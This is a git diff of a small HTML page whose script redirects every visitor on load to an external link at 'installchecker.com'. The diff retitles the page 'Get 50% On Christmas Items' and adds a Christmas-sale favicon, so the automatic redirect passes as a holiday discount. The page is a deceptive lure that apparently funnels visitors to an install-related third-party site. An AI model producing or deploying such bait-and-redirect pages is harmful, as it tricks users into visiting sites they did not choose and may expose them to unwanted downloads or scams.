--- a/index.html
+++ b/index.html
@@ -3,12 +3,12 @@
 <head>
   <link rel="icon" href="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg" type="image/x-icon">
   <meta charset="UTF-8">
-  <title>Redirecting...</title>
+  <title>Get 50% On Christmas Items</title>
     <script>
 window.location.href="https://installchecker.com/cl/i/42n311" ;
 </script>
 </head>
 <body>
-
+Redirecting...
 </body>
 </html>
